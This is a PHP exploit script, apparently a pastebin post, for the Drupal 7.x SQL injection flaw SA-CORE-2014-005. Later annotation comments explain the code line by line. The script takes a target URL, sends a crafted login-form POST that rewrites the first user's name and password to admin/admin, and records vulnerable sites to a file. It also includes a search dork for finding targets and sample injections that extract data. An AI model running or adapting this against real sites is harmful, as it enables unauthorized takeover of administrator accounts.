Googleinurl

[EXPLOIT] Drupal 7.x SQL Injection / INURL - BRASIL

Feb 7th, 2015
  1. <?php
  2.  
  3. /* Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
  4.   ----------------------------------------------------------
  5.  * Drupal 7 SQL Injection vulnerability demo
  6.  * Read more at http://milankragujevic.com/post/66
  7.  * This will change the first user's username to admin
  8.  * and their password to admin
  9.  * Change $url to the website URL
  10.   ----------------------------------------------------------
  11.  * EXTRA INFO:
  12.  * http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html
  13.  * http://pastebin.com/nDwLFV3v
  14.  * https://www.youtube.com/watch?v=rHwJYD_yTlM
  15.  * DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
  16.   ----------------------------------------------------------
  17.  * Script exploit developed by INURL - BRAZIL
 * AUTHOR*: Cleiton Pinheiro / NICK: GoogleINURL
  19.  * EMAIL*: [email protected]
  20.  * Blog*: http://blog.inurl.com.br
  21.  * Twitter*: https://twitter.com/googleinurl
  22.  * Fanpage*: https://fb.com/InurlBrasil
  23.  * GIT*: https://github.com/googleinurl
  24.  * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  25.  * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
  26.   ----------------------------------------------------------
  27.  *
  28.  * DORK: " Powered by Drupal" inurl:"user/register"
  29.  *
  30.  */
  31.  
// Runtime setup for CLI use: error_reporting(1) is E_ERROR only, so despite
// display_errors=1 only fatal errors are shown; the time limit is removed twice
// (set_time_limit and max_execution_time), URL wrappers are enabled (not needed
// by cURL itself), and output is flushed as it is produced.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
//echo '<pre>';

// CLI arguments: argv[1] is the base URL and is required — when missing or empty
// the exit() in the else-branch prints the usage text and stops the script;
// argv[2] is the report file, defaulting to OUTPUT_INURL_DRUPAL7.txt.
$params['url'] = isset($argv[1]) && !empty($argv[1]) ? $argv[1] : exit("SET TARGET URL ex: php exploitDrupal7.php http://target.com save.txt");
$params['output'] = isset($argv[2]) && !empty($argv[2]) ? $argv[2] : 'OUTPUT_INURL_DRUPAL7.txt';
// Form-encoded body for the user_login_block form; the injected UPDATE and the
// encoded password hash are the ones described in the header comment.
// This is the only body __request() sends.
$params['post'] = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
// Query string appended to the base URL by __request().
$params['url_request'] = '?q=node&destination=node';
  45.  
  46.  
//EXAMPLE INJECTIONS - http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html
//
// Reference samples copied from the Sucuri write-up. Both are assigned to the
// same key, so the second assignment overwrites the first, and __request()
// reads only $params['post'] — neither of these bodies is ever sent.
//
//users passwords:
$params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select+md5(1016)+from+users+limit+0,1)));%23%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

//select information_schema.tables:
// NOTE: the literal spans three source lines, so the body contains raw newlines.
$params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select md5(1122) from
information_schema.tables limit 1)));%23%20%20]=removed&name[0]=removed&pass=removed&
removed=removed&form_build_id=&form_id=user_login_block&op=Log+in";
  56.  
/**
 * Sends $params['post'] to the target in one POST request and reports, on
 * stdout and in the report file, whether the response matched the success
 * heuristic.
 *
 * @param array $params Expects the keys 'url' (base URL), 'url_request'
 *                      (query string appended to it), 'post' (form-encoded
 *                      body) and 'output' (path of the report file that is
 *                      appended to on a match).
 * @return void The outcome is only echoed / written to the file.
 */
function __request($params) {

    $objcurl = curl_init();
    curl_setopt($objcurl, CURLOPT_URL, $params['url'] . $params['url_request']);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    // Response headers are returned together with the body, so the stristr()
    // check below runs over headers and body alike.
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    // Fixed browser-like request headers. The Referer appears twice with
    // different values: here without the query string, and via CURLOPT_REFERER
    // below with it; which one libcurl emits is not checked here.
    curl_setopt($objcurl, CURLOPT_HTTPHEADER, array(
        'Content-Type: application/x-www-form-urlencoded',
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        "Referer: {$params['url']}",
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
    ));
    curl_setopt($objcurl, CURLOPT_REFERER, $params['url'] . $params['url_request']);
    // Setting POSTFIELDS is what turns this into a POST request.
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']);

    // No CURLOPT_TIMEOUT, no TLS options and no curl_error() check: a transport
    // failure leaves $corpo === false and falls through to the else branch.
    $corpo = curl_exec($objcurl);
    curl_close($objcurl);

    // Success heuristic: a case-insensitive match of the PHP warning text below
    // anywhere in the response. Defensive note: that same warning line in a
    // PHP/web-server error log is a concrete indicator that a request of this
    // shape reached the application and is worth alerting on.
    if (stristr($corpo, 'mb_strlen() expects parameter 1 to be string') && $corpo) {
        echo "[INFO]: VULNERABLE! Log in with username \"admin\" and password \"admin\" at {$params['url']}/user/login \n";
        echo "[INFO][OUTPUT]: {$params['output']}\n";
        $output = "-------------------------------------\n";
        $output.= "[INFO][URL]: {$params['url']}/user/login\n";
        $output.= "[INFO][LOGIN]: admin / pass: admin\n";
        // Server-local time, no timezone recorded.
        $output.= "[INFO][DATE]: " . date("d-m-Y H:i:s");
        $output.= "\n-------------------------------------\n\n";
        echo $output;
        // Return value is not checked, so an unwritable report path fails silently.
        file_put_contents($params['output'], $output, FILE_APPEND);
    } else {
        // Also reached on connection errors, timeouts and any non-matching response.
        echo "[INFO]: NOT Vulnerable , or your Internet isn't working. \n\n";
    }
}
  92.  
// Entry point: issue the single request with the parameters built above.
__request($params);